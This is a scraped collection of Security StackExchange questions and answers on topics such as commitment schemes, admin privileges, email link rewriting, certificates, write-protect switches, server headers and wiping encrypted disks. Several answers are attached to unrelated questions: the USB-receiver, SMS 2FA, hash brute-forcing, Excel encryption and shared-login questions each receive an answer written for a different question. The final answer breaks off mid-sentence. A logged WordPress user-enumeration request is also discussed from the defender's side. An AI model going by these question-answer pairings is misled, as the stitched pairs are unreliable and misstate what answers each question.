{ "source": [ "https://security.stackexchange.com/questions/263582", "https://security.stackexchange.com", "https://security.stackexchange.com/users/117565/" ] }
264,180
I'm looking for the name of a concept that works as follows: I post a hash of a file publically e.g. on Twitter Whenever needed, I provide the file with the contents that make up the given hash The purpose is maybe to proof ownership or otherwise proof that something was known to me in the past before it became public. Knowing the name will enable me reading more about it.
To me this sounds like a commitment scheme : A commitment scheme is a cryptographic primitive that allows one to commit to a chosen value (or chosen statement) while keeping it hidden to others, with the ability to reveal the committed value later ... Interactions in a commitment scheme take place in two phases: the commit phase during which a value is chosen and committed to the reveal phase during which the value is revealed by the sender, then the receiver verifies its authenticity You can see this term being used by several of the answers to this question, for example.
{ "source": [ "https://security.stackexchange.com/questions/264180", "https://security.stackexchange.com", "https://security.stackexchange.com/users/35666/" ] }
264,479
I have seen a few system designs in my time and one question keeps cropping up: Is it bad practice to have 'super admin' - single user - or 'super admin' privileges in your system? By that I mean giving one or many users 'super admin' privileges so they basically never see a "you do not have permission" error and are never prevented from doing anything in the system. This is from a security standpoint mainly - If someone somehow managed to login to an account that has 'super admin' privileges (when they shouldn't have access) they could wreak havoc as they can change anything in the system
I would split my answer into two parts: Super admin in general When designing a system, you do not want to get into a situation where no one is able to access the system and manage it as needed, especially when an emergency is at hand. On the other hand, you probably don't want a single entity to be able to manage and control all properties of the said system. For this particular reason, many designs include this role but with a limited assignment. This role is mostly assigned to either "non-personal" user account that its credentials are safeguarded by a quorum of trusted people. Another option is to have this role assigned to multiple trusted users with an approval quorum to apply sensitive modifications. Sometimes similar account is also created as a local account (in case the others are governed by an organization's centralized identity management platform such as Okta) to allow out-of-band access in case of emergencies. Users assuming super administrative privileges at all times Per security design principles, you want to avoid excessive privileges assigned to personnel. Your system should support access packages and roles to bind for the specific actions they need to perform over your system. Let them perform whatever operations they need, nothing else. It doesn't necessarily mean you are giving them the key to your castle if they are system administrators. You can put senstive operations under additional security measures such as just-in-time access with an external supervisor to allow the grant, etc.
{ "source": [ "https://security.stackexchange.com/questions/264479", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15982/" ] }
264,491
I bought a wireless keyboard and mouse from a no-name brand (made in China) with a USB receiver. I'm currently wondering if the USB receiver could be compromised in a way, that my computer could get infected with malware or that allows someone to gain access to my computer. Should I be more careful with such USB sticks? How can I check if the USB receiver is clean? I'm not sure if I should use the keyboard/mouse, am I too cautious? I quote from an article : "If your mouse has programmable memory, like a gaming mouse that allows you to program macro buttons, the mouse itself could store and spread malware. To make matters worse, there are no known defensive mechanisms when it comes to attacks through USB devices. The reason is that all of that well-paid-for malware detection software you purchased can’t detect firmware that is running on USB devices. The good news is there isn’t really any monetary gain in creating viruses that specifically target hardware like computer mice, but malware can have an effect on the drivers that mice utilize, and this may result in hardware issues like key-swapping or keys not working." Would you agree with that analysis?
I would split my answer into two parts: Super admin in general When designing a system, you do not want to get into a situation where no one is able to access the system and manage it as needed, especially when an emergency is at hand. On the other hand, you probably don't want a single entity to be able to manage and control all properties of the said system. For this particular reason, many designs include this role but with a limited assignment. This role is mostly assigned to either "non-personal" user account that its credentials are safeguarded by a quorum of trusted people. Another option is to have this role assigned to multiple trusted users with an approval quorum to apply sensitive modifications. Sometimes similar account is also created as a local account (in case the others are governed by an organization's centralized identity management platform such as Okta) to allow out-of-band access in case of emergencies. Users assuming super administrative privileges at all times Per security design principles, you want to avoid excessive privileges assigned to personnel. Your system should support access packages and roles to bind for the specific actions they need to perform over your system. Let them perform whatever operations they need, nothing else. It doesn't necessarily mean you are giving them the key to your castle if they are system administrators. You can put senstive operations under additional security measures such as just-in-time access with an external supervisor to allow the grant, etc.
{ "source": [ "https://security.stackexchange.com/questions/264491", "https://security.stackexchange.com", "https://security.stackexchange.com/users/282252/" ] }
264,533
Our work e-mail server has started rewriting links in incoming mail through a redirecting gateway, for "security reasons": if I receive an e-mail containing a link to https://security.stackexchange.com , the link gets rewritten to https://es.sonicurlprotection-fra.com/click?PV=2&MSGID=202209021358500174760&URLID=1&ESV=10.0.18.7423&IV=D329C6F4AF0738E931FA9F0EAAD309B2&TT=1662127131399&ESN=kgatDRmAwf3NdgkHDeepamZT4x4VYB71UZXeLJNkMQ0%3D&KV=1536961729280&B64_ENCODED_URL=aHR0cHM6Ly9zZWN1cml0eS5zdGFja2V4Y2hhbmdlLmNvbQ&HK=B0A81618C6DD8CBAFF5376A265D02328AB2DA6B2A64AA8DA59F1662AC2089052 before the mail arrives into my Inbox. Clicking on this opaque blob redirects me to https://security.stackexchange.com . Presumably, the idea is that if the target address turns out to be malicious then the mail server provider (Sonicwall) can decide to block the link even retroactively in messages that have already been delivered. Is this kind of link tracking considered good security practice? Are there any authoritative opinions on it from researchers, for instance? At a first thought, I can come up with many disadvantages, and minimal advantages (but I am no security expert). I have tried looking for opinions online, but the only articles I find come from people that are trying to sell similar technology, so they might be biased: for instance this , this and this .
This practice actually has a bunch of security downsides that make it problematic. First, modifying the email breaks any sort of digital signature on it, such as DKIM. This can be used by the mail server or the mail client to verify that the author is who they say they are. For example, if your mail client says, "This email is from stackexchange.com," then you can know that the email may be legitimate if it looks like a StackExchange email, but this can't be done if you modify the email. Second, it also means that the URL no longer points to the actual domain. This makes phishing easier, since every illegitimate link looks just like a legitimate link: it goes to some rewritten domain. If the user is expecting a link to an internal domain, they can no longer determine if the link is legitimate just by looking at the hostname in the URL. A better practice would be to use some sort of endpoint software or trusted DNS server which logs all domains used or disallows known malicious sites. This is common in a lot of places and avoids the security downsides of tampering with data. You can also scan them when they come into the server and look for suspicious looking URLs, such as those which look like some sort of impersonation attack on legitimate domains or those which are known to be associated with malware or phishing. I also should point out that you should not under any circumstances use a TLS intercepting proxy as Steffen Ulrich suggests. Security research has found numerous vulnerabilities in these devices, including weak algorithms, insecure protocol versions, and lack of certificate validation, any of which can mean that data can just be decrypted by an attacker. What's more, they are often just functionally broken and don't speak the protocol correctly, which I can tell you from years of dealing with end user problems as a Git contributor.
{ "source": [ "https://security.stackexchange.com/questions/264533", "https://security.stackexchange.com", "https://security.stackexchange.com/users/29374/" ] }
264,912
As the title says, in the rules of engagement I have my scope, used method, etc. but I've been wondering if I should also include a list of tools (such as NMAP, Dirb/Ffuf, etc.) that might be used. And if not, how should I be transparent with the client about the way I'm going to perform the pentest? My concern is that management will not understand the tools I'd like including in the RoE, even with a small description trying to explain the purpose of the tool.
You should explain your methodology, but a full list of tools usually isn't included for several reasons: You don't actually know all the tools that you're going to use before you've finished testing. Most clients don't really care and won't read it anyway. Some tools have names that are not very professional, which doesn't look great in a formal document. No one cares that you use "Notepad" or "Google Chrome", so adding things like that is a waste of time. It perpetuates the idea that pentesting is just running a load of tools against the target. Management don't need to know and understand all of the tools. When they get a builder in to build them a new office, they don't ask for a list of every tool that they're going to use. They hire a professional, and leave those decisions up to them. If the client asks, you can give them a list at the end of the engagement (or an indicative list before you start). But it's not something I would do as standard.
{ "source": [ "https://security.stackexchange.com/questions/264912", "https://security.stackexchange.com", "https://security.stackexchange.com/users/271649/" ] }
264,919
I visited stackoverflow.com and found in Chrome that its certificate is valid and has Common Name (CN) *.stackexchange.com . After that I checked a fingerprint for stackexchange.com and it matched the first one. I thought that Chrome would show me a warning that the domain didn't match, as stackoverflow.com doesn't redirect to stackexchange.com and it doesn't have a CNAME to it - dig +short stackoverflow.com cname - shows nothing. My question is: how does Chrome recognise that stackoverflow.com is part of *.stackexchange.com ?
A certificate Common Name is not the only thing used to validate a certificate. It is actually only used for very primitive certificates that lack a subjectAltName extension. The StackOverflow certificate has got a subjectAltName field with the following dNSNames in it, which allow the certificate to validate for StackOverflow. *.askubuntu.com *.blogoverflow.com *.mathoverflow.net *.meta.stackexchange.com *.meta.stackoverflow.com *.serverfault.com *.sstatic.net *.stackexchange.com *.stackoverflow.com *.stackoverflow.email *.stackoverflowteams.com *.superuser.com askubuntu.com blogoverflow.com mathoverflow.net openid.stackauth.com serverfault.com sstatic.net stackapps.com stackauth.com stackexchange.com stackoverflow.blog stackoverflow.com stackoverflow.email stackoverflowteams.com stacksnippets.net superuser.com
{ "source": [ "https://security.stackexchange.com/questions/264919", "https://security.stackexchange.com", "https://security.stackexchange.com/users/189533/" ] }
265,066
We have a service running behind https and we are using SSL certificates from Let's Encrypt. The problem is that one of our clients distrusts Let's Encrypt CA and on certificate renewal it requires to us to send the newly generated certificate in order to add it to the trust chain. Is this a common practice? Which are the reasons to distrust certificates from Let's Encrypt?
This is an old policy. Getting a certificate was difficult and expensive, which prevented malicious people from getting it, which made it an easy way to identify "trusted" sites. Because LE allows anyone to get a certificate, then it allows malicious people to get a certificate and get that "green lock" and the symbol of "trust". In response, some organisations added a rule to not accept LE certificates so that sites that used them would not be "trusted". As misguided as this is. Very large corporate sites now use LE, so this policy makes no sense. So, I would work with the client to change their policy. From my experience, organisations that added this rule quickly rescinded it and I have not heard of an organisation with it still in place.
{ "source": [ "https://security.stackexchange.com/questions/265066", "https://security.stackexchange.com", "https://security.stackexchange.com/users/199620/" ] }
265,424
I was looking through my Apache log files and besides other GET requests with response status codes of 4XX (error), I've found this one which has a 200 (success) response status code: "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 5453 "-" "Go-http-client/1.1" First of all, the status code 200 doesn't imply that the request was successful in regards to passing a variable successfully, correct? How would I check then, if such a probe/attack was successful? Would I manually need to go into my files and scan through the code if such a request would do something malicious? Lastly, what was the bot (I assume it is a bot) trying to achieve with this request specifically? Is it trying to get some data about WordPress users?
The reason it counts as "success" is because of the beginning: /?... This means the path the server cares about is / , which likely maps to the index of your web application. The query string after, ?rest_route=/wp/v2/users/ , is likely ignored by your web application. In fact, you can try this on a bunch of websites, such as security.stackexchange.com/?rest_route=/wp/v2/users/ and you will get a 200 Success code returned. How can I check if it was successful? In this example, thw "/wp/v2/users/" indicates that the attacker was likely trying to exploit a wordpress misconfiguration to retrieve the list of users through a REST API. If you open your page with that URL and see just the normal index, then it's safe to say that attempt failed. As for a general answer...that's hard to say. The whole field of digital forensics and incident response is about identifying such indicators of compromise.
{ "source": [ "https://security.stackexchange.com/questions/265424", "https://security.stackexchange.com", "https://security.stackexchange.com/users/283904/" ] }
265,536
Can the internet be censored from the ISP itself? And what to do if the internet is censored by my ISP? Even TOR is not showing me the results I want: I had previously searched for the same keywords and got results but now I don't get anything. I have tried a premium VPN and TOR to browse content but both of them fail. How can I bypass my ISP censorship?
Generally speaking, your ISP can't censor Tor or VPNs except by blocking them altogether. Since you are also "censored" when using Tor and a VPN, it's more likely that either the search engine is censoring your results (if you are using the same one) or else the thing you are trying to find doesn't exist on the Internet any more.
{ "source": [ "https://security.stackexchange.com/questions/265536", "https://security.stackexchange.com", "https://security.stackexchange.com/users/284121/" ] }
265,582
Floppy disks used to have a physical means of preventing writing to them. No software could bypass that, no matter what. It had to be flicked physically and manually by a human being. Modern SD cards and SD card converters have a physical such switch, but it does not physically prevent anything and only "advises" the software to not write, which it can ignore at will, rendering it completely meaningless and downright deceptive . Not a single one of all my many external USB hard disks, even including an older and bigger 3.5" one, have even any such "pretend-switch" on them. Nothing. Why did they go from allowing physical write protection to not even having a silly "pretend-switch" for this? I've never heard anyone mention this, but to me it's absolutely mindblowing and keeps bothering me every single time I take out my backup media on both disks and memory cards and sticks. Being able to do this is crucial when restoring important backups on potentially malware-infested computers, or when people prone to making honest mistakes are dealing with them and you only want them to be able to fetch/read data but not corrupt/delete it. It would cost them maybe $0.001 extra per unit to add this. And I haven't even seen it on the really expensive products (except the fake ones on the memory cards mentioned above).
Floppy disks used to have a physical means of preventing writing to them. No software could bypass that, no matter what. It had to be flicked physically and manually by a human being. They didn't. It was ultimately controlled by the floppy drive. The plastic tab indicated whatever the floppy was write protected or not, but ultimately a drive could be made that ignored it. That's no different from SD cards. What's changed is how much is exposed to the host computer: with floppies, the R/W signal could not be overriden by the host using the standard floppy disk interface. With SD card readers, it's simply a bit sent to the software driver for the card reader. Why doesn't modern media generally provide this? Well, if read only is a required feature, there's (as indicated by other answers ) products that offers this. In the not so far past, there was also the extremely common optical media: CD-R and later DVD-R, which housed quite a lot and cost next to nothing, with a write after initial recording being impossible. So in short: it's not a feature most customers are willing to pay for, so it's not delivered in most mass storage devices. If you need it, get a device with a switch, and pay the premium for it.
{ "source": [ "https://security.stackexchange.com/questions/265582", "https://security.stackexchange.com", "https://security.stackexchange.com/users/284190/" ] }
265,588
I already have an authenticator for Amazon AWS, and I'm being regularly asked to add an SMS 2FA as well. If I add SMS MFA, will I become vulnerable to sim-swapping attacks on that MFA? Same thing with many other services, I already have authenticators with them, and they're still asking me to add an SMS 2FA. Here's the prompt I get, although I already have an authenticator setup:
Floppy disks used to have a physical means of preventing writing to them. No software could bypass that, no matter what. It had to be flicked physically and manually by a human being. They didn't. It was ultimately controlled by the floppy drive. The plastic tab indicated whatever the floppy was write protected or not, but ultimately a drive could be made that ignored it. That's no different from SD cards. What's changed is how much is exposed to the host computer: with floppies, the R/W signal could not be overriden by the host using the standard floppy disk interface. With SD card readers, it's simply a bit sent to the software driver for the card reader. Why doesn't modern media generally provide this? Well, if read only is a required feature, there's (as indicated by other answers ) products that offers this. In the not so far past, there was also the extremely common optical media: CD-R and later DVD-R, which housed quite a lot and cost next to nothing, with a write after initial recording being impossible. So in short: it's not a feature most customers are willing to pay for, so it's not delivered in most mass storage devices. If you need it, get a device with a switch, and pay the premium for it.
{ "source": [ "https://security.stackexchange.com/questions/265588", "https://security.stackexchange.com", "https://security.stackexchange.com/users/837/" ] }
265,601
I have a list of hashes, I need to find the original value of any of them. So far I know that the hashes are only numbers of length 30. The format should be something like 012524012524012524012524012524. What is the best way to create an algorithm that bruteforce numbers until any hash match? I have thought of a few options but I don't think any of them are optimized: Generate random numbers until one collide. Iterate numbers from 000000000000000000000000000000 sequentially.
Floppy disks used to have a physical means of preventing writing to them. No software could bypass that, no matter what. It had to be flicked physically and manually by a human being. They didn't. It was ultimately controlled by the floppy drive. The plastic tab indicated whatever the floppy was write protected or not, but ultimately a drive could be made that ignored it. That's no different from SD cards. What's changed is how much is exposed to the host computer: with floppies, the R/W signal could not be overriden by the host using the standard floppy disk interface. With SD card readers, it's simply a bit sent to the software driver for the card reader. Why doesn't modern media generally provide this? Well, if read only is a required feature, there's (as indicated by other answers ) products that offers this. In the not so far past, there was also the extremely common optical media: CD-R and later DVD-R, which housed quite a lot and cost next to nothing, with a write after initial recording being impossible. So in short: it's not a feature most customers are willing to pay for, so it's not delivered in most mass storage devices. If you need it, get a device with a switch, and pay the premium for it.
{ "source": [ "https://security.stackexchange.com/questions/265601", "https://security.stackexchange.com", "https://security.stackexchange.com/users/284210/" ] }
265,796
How serious a security problem is it to have the name of the web server in the HTTP header (Apache, Nginx etc.)? I am discussing this with a system administrator and he told me that deleting version is easy, but deleting the name of the server (in our case nginx) is not so simple and it takes more time. So, he thinks that it is useless, because, there are a lot of tools that are able to detect the type of server based on HTTP header. On the other side, I have always read that information like this should be removed. My question is - Is information like this a serious problem and should be removed, or not? (I assume fully patched server)
Assuming that the server is fully patched and you're just talking about product name and not version, I wouldn't generally regard this as a serious problem. Essentially all security hardening is a trade-off between effort and risk reduction. Here you would potentially be reducing the risk marginally of a successful attack, but at the cost of effort to implement. In reality there's likely other places the same effort could be spent, to better effect. In an ideal world you don't give possible attackers any information you don't have to as it makes their lives harder and forces them to spend more effort on each attack, but with things like product name (especially for common products like nginx) that's a pretty marginal benefit.
{ "source": [ "https://security.stackexchange.com/questions/265796", "https://security.stackexchange.com", "https://security.stackexchange.com/users/284521/" ] }
265,801
I have a 4TB mechanical hard drive that was encrypted before I ever wrote any file on it. I used a 25 character password with symbols. Before I sold it, I unmounted the disk while it was still encrypted, then I formatted it to a new unencrypted volume. After I formatted it, it appeared on my Desktop as a new empty unencrypted disk. I used Disk Utility on Mac to write random data on it, but it was very slow, so I ended up writing on only 10% of the disk. Has the data been securely erased beyond any doubt?
Has the data been securely erased beyond any doubt? No. Does it matter in practice? Probably not, at least for any sensible domestic/company threat model. For the purposes of this answer I will presume that your disk was encrypted with a standard password unlock scheme and no TPM was involved. I will also presume a mechanical hard disk, as noted in your question, not an SSD. It is important to note that SSDs have special properties when it comes to FDE and data destruction which complicate the situation; there are other questions/answers on this site that discuss this in detail. Typically, FDE volumes have a randomly generated volume key that is used for the bulk encryption of data on the disk. The volume key (and various other information) is placed into a volume header. Your disk unlock password is used to derive a volume unlock key, which is used to encrypt the volume header. This description is a bit of a simplification, but for the purposes of this question it is sufficient. There are several reasons for using this volume header approach rather than just using your unlock key directly for bulk data encryption. The primary benefit is convenience: if you want to change your password, the only thing that needs to be re-encrypted is the volume header, rather than the entire disk. There are other benefits, too: It minimises the amount of data secured with the same key, since two disks that use the same password will utilise different bulk encryption keys. The bulk encryption key can be exported for recovery purposes, and if this key is compromised then it only compromises that one disk instead of all disks that use the same password. Implementing multi-user unlock schemes is simple. The volume header is duplicated for each user and encrypted with an unlock key derived from that user's password. Any one user can then unlock the disk. Alternative unlock schemes (e.g. TPM, hardware token / smart card, etc.) are easier to implement. Data destruction does not require that the whole disk be wiped, but only that the volume headers are destroyed, which saves time and disk wear. (The story is more complicated on SSDs but we're talking about HDDs here.) That last point is a double-edged sword. If the FDE volume header is damaged or destroyed, e.g. due to disk corruption, all of your data is unrecoverable . If you lose the volume header, you lose the key that was used to encrypt the data on the disk, so the recovery problem becomes equivalent to cracking the randomly generated key. This is great if you're intentionally trying to destroy the data on the disk, but it sucks when it happens unintentionally. To minimise the risk of unintentional damage to the volume header, FDE schemes typically make one or more backup copies of that header. When you encrypt the drive you are usually prompted to save a recovery key or make some kind of recovery USB stick. The exact implementations vary, but these recovery processes either back up the plaintext bulk encryption key (and other necessary parameters like the IV) or the entire volume header block. This recovery material is usually designed to be able to decrypt the bulk data on the disk without needing an intact volume header or the unlock password. However, this is usually not the only backup. Most FDE schemes store a primary and secondary volume header somewhere on the disk, with the secondary header being used as a built-in backup. Both headers are encrypted, so there's no security impact to making multiple copies. A common approach is to store one copy at the "start" of the disk (low logical block address) and another copy either at the "end" of the disk (high logical block address) or at some known offset. This ensures that the two copies are physically separate on the storage medium, so a bad sector or other corruption is unlikely to affect both copies. Corruption can be detected by comparing the two headers. This volume header backup scheme has implications for data destruction. Exploring these implications is easiest if we think about the potential scenarios: FDE was always in use on the drive (no risk of latent plaintext) but no data has been wiped. A partial wipe was performed on the disk. The primary volume header was wiped, but not the secondary header (or vice versa). The bulk data was not wiped, or only a small part of it was. A partial wipe was performed on the disk. Both primary and secondary volume headers were wiped. The bulk data was not wiped, or only a small part of it was. A full wipe was performed on the disk. The first scenario is no different to normal use of FDE. An attacker would need to guess or bruteforce your password, get access to your recovery key, or bruteforce the volume header key or bulk encryption key (which is computationally infeasible). In the second scenario you've wiped one header but not the other. Since the disk contains a secondary header, it can be used to unlock the disk. Again, an attacker would need to guess or bruteforce your password, get access to your recovery key, or bruteforce the volume header key or bulk encryption key (computationally infeasible). If they do recover the bulk encryption key through one of these means, the difficulty of recovery depends on how much of the bulk data was wiped alongside the header. In the third scenario you've wiped both headers. The disk no longer contains a copy of the bulk encryption key. An attacker no longer has the option to brute-force or otherwise crack your unlock password. They would need to get access to your recovery key, or bruteforce the bulk encryption key (again, computationally infeasible). If they do recover the bulk encryption key through one of these means, the difficulty of recovery depends on how much of the bulk data was wiped alongside the header. In the fourth scenario you've wiped the whole disk. None of the data is left, so an attacker can't do anything. Ignore anyone who starts talking about multi-pass wiping and magical physical-layer recovery tricks like Magnetic Force Microscopy (MFM) - it's nonsense, and even if it did work nobody is going to bother (not even nation states). A full rant about wacky DoD disk erasure standards and their ongoing abuse by wiping software marketing teams is out of scope for this answer. Suffice to say that NIST SP 800-88 Rev.1 is the right place to look if you want a high quality media sanitisation standard. Now the question arises: which of these situations applies to you? It depends, but the answer is almost certainly 2 or 3. If the FDE implementation you used puts the secondary volume header at a fixed offset, it's possible that you wiped both of them, which would put you in scenario 3. If the secondary volume header is at the "end" of the disk, then it may not have been wiped, which would put you in scenario 2. This is assuming that the disk wipe utility starts at the beginning of the disk (LBA 0) and writes sequentially from there - if it doesn't, all bets are off. You can reasonably gather whether you're in scenario 2 or 3 by attempting to mount the disk. If you can get it to mount without needing a recovery key, you didn't get both of the headers. If you can't, you're probably in scenario 3. There may be edge cases where the backup volume header is present but the software still fails to mount/recover for some reason, so it's not a 100% guarantee, but it's a good indication. It's also important to note that you probably damaged the filesystem, so the FDE might unlock successfully but the underlying filesystem might not actually mount; this is an important distinction because unlocking is the bit we actually care about for security. Given all this, the worst case scenario is that your data isn't unrecoverable but is still protected by FDE. Almost every single attacker (bored teenager, cybercriminals, law enforcement) will be defeated by this already, with an exception for the case where someone compels you to reveal your unlock password (highly unlikely). The best case scenario is that you wiped the volume headers and the data is infeasible to recover even with all the computational resources in the world, unless someone gets at your recovery keys (if you have them). Since FDE already provides protection against everything except being legally compelled to reveal your password (I'll assume that someone hitting you with a wrench is out of scope for your threat model because you're not a character on the TV show "24") it's mostly a symbolic improvement in security for the bulk of sensible threat models. TL;DR - I wouldn't worry about it too much. FDE alone is already a concrete security control as long as your password is good. Any amount of disk wiping you do afterwards is a tradeoff between time/effort and a little extra defence in depth.
{ "source": [ "https://security.stackexchange.com/questions/265801", "https://security.stackexchange.com", "https://security.stackexchange.com/users/135759/" ] }
265,805
I have a need to send a 3rd party regular Excel files. I currently use excel password protection on the file itself and the password I use is known by the 3rd party. However, today I read a thread on this forum that appears to say it is unsafe to password-protect an Excel file. But this is counter to my understanding because I believe Excel uses 256-bit AES encryption which is currently unbreakable. However the thread also talks about individual features of Excel and I am finding it difficult to separate the file password encryption from the feature protection, like protect a sheet in a workbook or cell protection. So can someone advise if I place a password on the file such that it can not be opened, is it safe (within the limits of 256-bit encryption) or not? BTW, I am using M365, I am not bothered by over-the-shoulder or cut-and-paste hacks as that is the 3rd parties problem from a data protection point of view.
Has the data been securely erased beyond any doubt? No. Does it matter in practice? Probably not, at least for any sensible domestic/company threat model. For the purposes of this answer I will presume that your disk was encrypted with a standard password unlock scheme and no TPM was involved. I will also presume a mechanical hard disk, as noted in your question, not an SSD. It is important to note that SSDs have special properties when it comes to FDE and data destruction which complicate the situation; there are other questions/answers on this site that discuss this in detail. Typically, FDE volumes have a randomly generated volume key that is used for the bulk encryption of data on the disk. The volume key (and various other information) is placed into a volume header. Your disk unlock password is used to derive a volume unlock key, which is used to encrypt the volume header. This description is a bit of a simplification, but for the purposes of this question it is sufficient. There are several reasons for using this volume header approach rather than just using your unlock key directly for bulk data encryption. The primary benefit is convenience: if you want to change your password, the only thing that needs to be re-encrypted is the volume header, rather than the entire disk. There are other benefits, too: It minimises the amount of data secured with the same key, since two disks that use the same password will utilise different bulk encryption keys. The bulk encryption key can be exported for recovery purposes, and if this key is compromised then it only compromises that one disk instead of all disks that use the same password. Implementing multi-user unlock schemes is simple. The volume header is duplicated for each user and encrypted with an unlock key derived from that user's password. Any one user can then unlock the disk. Alternative unlock schemes (e.g. TPM, hardware token / smart card, etc.) are easier to implement. Data destruction does not require that the whole disk be wiped, but only that the volume headers are destroyed, which saves time and disk wear. (The story is more complicated on SSDs but we're talking about HDDs here.) That last point is a double-edged sword. If the FDE volume header is damaged or destroyed, e.g. due to disk corruption, all of your data is unrecoverable . If you lose the volume header, you lose the key that was used to encrypt the data on the disk, so the recovery problem becomes equivalent to cracking the randomly generated key. This is great if you're intentionally trying to destroy the data on the disk, but it sucks when it happens unintentionally. To minimise the risk of unintentional damage to the volume header, FDE schemes typically make one or more backup copies of that header. When you encrypt the drive you are usually prompted to save a recovery key or make some kind of recovery USB stick. The exact implementations vary, but these recovery processes either back up the plaintext bulk encryption key (and other necessary parameters like the IV) or the entire volume header block. This recovery material is usually designed to be able to decrypt the bulk data on the disk without needing an intact volume header or the unlock password. However, this is usually not the only backup. Most FDE schemes store a primary and secondary volume header somewhere on the disk, with the secondary header being used as a built-in backup. Both headers are encrypted, so there's no security impact to making multiple copies. A common approach is to store one copy at the "start" of the disk (low logical block address) and another copy either at the "end" of the disk (high logical block address) or at some known offset. This ensures that the two copies are physically separate on the storage medium, so a bad sector or other corruption is unlikely to affect both copies. Corruption can be detected by comparing the two headers. This volume header backup scheme has implications for data destruction. Exploring these implications is easiest if we think about the potential scenarios: FDE was always in use on the drive (no risk of latent plaintext) but no data has been wiped. A partial wipe was performed on the disk. The primary volume header was wiped, but not the secondary header (or vice versa). The bulk data was not wiped, or only a small part of it was. A partial wipe was performed on the disk. Both primary and secondary volume headers were wiped. The bulk data was not wiped, or only a small part of it was. A full wipe was performed on the disk. The first scenario is no different to normal use of FDE. An attacker would need to guess or bruteforce your password, get access to your recovery key, or bruteforce the volume header key or bulk encryption key (which is computationally infeasible). In the second scenario you've wiped one header but not the other. Since the disk contains a secondary header, it can be used to unlock the disk. Again, an attacker would need to guess or bruteforce your password, get access to your recovery key, or bruteforce the volume header key or bulk encryption key (computationally infeasible). If they do recover the bulk encryption key through one of these means, the difficulty of recovery depends on how much of the bulk data was wiped alongside the header. In the third scenario you've wiped both headers. The disk no longer contains a copy of the bulk encryption key. An attacker no longer has the option to brute-force or otherwise crack your unlock password. They would need to get access to your recovery key, or bruteforce the bulk encryption key (again, computationally infeasible). If they do recover the bulk encryption key through one of these means, the difficulty of recovery depends on how much of the bulk data was wiped alongside the header. In the fourth scenario you've wiped the whole disk. None of the data is left, so an attacker can't do anything. Ignore anyone who starts talking about multi-pass wiping and magical physical-layer recovery tricks like Magnetic Force Microscopy (MFM) - it's nonsense, and even if it did work nobody is going to bother (not even nation states). A full rant about wacky DoD disk erasure standards and their ongoing abuse by wiping software marketing teams is out of scope for this answer. Suffice to say that NIST SP 800-88 Rev.1 is the right place to look if you want a high quality media sanitisation standard. Now the question arises: which of these situations applies to you? It depends, but the answer is almost certainly 2 or 3. If the FDE implementation you used puts the secondary volume header at a fixed offset, it's possible that you wiped both of them, which would put you in scenario 3. If the secondary volume header is at the "end" of the disk, then it may not have been wiped, which would put you in scenario 2. This is assuming that the disk wipe utility starts at the beginning of the disk (LBA 0) and writes sequentially from there - if it doesn't, all bets are off. You can reasonably gather whether you're in scenario 2 or 3 by attempting to mount the disk. If you can get it to mount without needing a recovery key, you didn't get both of the headers. If you can't, you're probably in scenario 3. There may be edge cases where the backup volume header is present but the software still fails to mount/recover for some reason, so it's not a 100% guarantee, but it's a good indication. It's also important to note that you probably damaged the filesystem, so the FDE might unlock successfully but the underlying filesystem might not actually mount; this is an important distinction because unlocking is the bit we actually care about for security. Given all this, the worst case scenario is that your data isn't unrecoverable but is still protected by FDE. Almost every single attacker (bored teenager, cybercriminals, law enforcement) will be defeated by this already, with an exception for the case where someone compels you to reveal your unlock password (highly unlikely). The best case scenario is that you wiped the volume headers and the data is infeasible to recover even with all the computational resources in the world, unless someone gets at your recovery keys (if you have them). Since FDE already provides protection against everything except being legally compelled to reveal your password (I'll assume that someone hitting you with a wrench is out of scope for your threat model because you're not a character on the TV show "24") it's mostly a symbolic improvement in security for the bulk of sensible threat models. TL;DR - I wouldn't worry about it too much. FDE alone is already a concrete security control as long as your password is good. Any amount of disk wiping you do afterwards is a tradeoff between time/effort and a little extra defence in depth.
{ "source": [ "https://security.stackexchange.com/questions/265805", "https://security.stackexchange.com", "https://security.stackexchange.com/users/284541/" ] }
265,814
Goal I'd like to have multiple independent websites with one shared authentication server. The auth server will have one database in which all users are stored (just username, email and password, so different data models are of no concern). User 1 from website A should only be able to log-in at A.com, while user 2 from website B should only be able to log-in at B.com. Question Would it be SAFE to store the url of the website with the user record, which is the only website they should be granted access to? So for example: { username: a, email: [email protected] password: **** website: A.com }, { username: b, email: [email protected] password: **** website: B.com } Why this approach Correct me if I'm wrong, but otherwise I'd have to host a seperate database, cache and server for each website with a log-in.
Has the data been securely erased beyond any doubt? No. Does it matter in practice? Probably not, at least for any sensible domestic/company threat model. For the purposes of this answer I will presume that your disk was encrypted with a standard password unlock scheme and no TPM was involved. I will also presume a mechanical hard disk, as noted in your question, not an SSD. It is important to note that SSDs have special properties when it comes to FDE and data destruction which complicate the situation; there are other questions/answers on this site that discuss this in detail. Typically, FDE volumes have a randomly generated volume key that is used for the bulk encryption of data on the disk. The volume key (and various other information) is placed into a volume header. Your disk unlock password is used to derive a volume unlock key, which is used to encrypt the volume header. This description is a bit of a simplification, but for the purposes of this question it is sufficient. There are several reasons for using this volume header approach rather than just using your unlock key directly for bulk data encryption. The primary benefit is convenience: if you want to change your password, the only thing that needs to be re-encrypted is the volume header, rather than the entire disk. There are other benefits, too: It minimises the amount of data secured with the same key, since two disks that use the same password will utilise different bulk encryption keys. The bulk encryption key can be exported for recovery purposes, and if this key is compromised then it only compromises that one disk instead of all disks that use the same password. Implementing multi-user unlock schemes is simple. The volume header is duplicated for each user and encrypted with an unlock key derived from that user's password. Any one user can then unlock the disk. Alternative unlock schemes (e.g. TPM, hardware token / smart card, etc.) are easier to implement. Data destruction does not require that the whole disk be wiped, but only that the volume headers are destroyed, which saves time and disk wear. (The story is more complicated on SSDs but we're talking about HDDs here.) That last point is a double-edged sword. If the FDE volume header is damaged or destroyed, e.g. due to disk corruption, all of your data is unrecoverable . If you lose the volume header, you lose the key that was used to encrypt the data on the disk, so the recovery problem becomes equivalent to cracking the randomly generated key. This is great if you're intentionally trying to destroy the data on the disk, but it sucks when it happens unintentionally. To minimise the risk of unintentional damage to the volume header, FDE schemes typically make one or more backup copies of that header. When you encrypt the drive you are usually prompted to save a recovery key or make some kind of recovery USB stick. The exact implementations vary, but these recovery processes either back up the plaintext bulk encryption key (and other necessary parameters like the IV) or the entire volume header block. This recovery material is usually designed to be able to decrypt the bulk data on the disk without needing an intact volume header or the unlock password. However, this is usually not the only backup. Most FDE schemes store a primary and secondary volume header somewhere on the disk, with the secondary 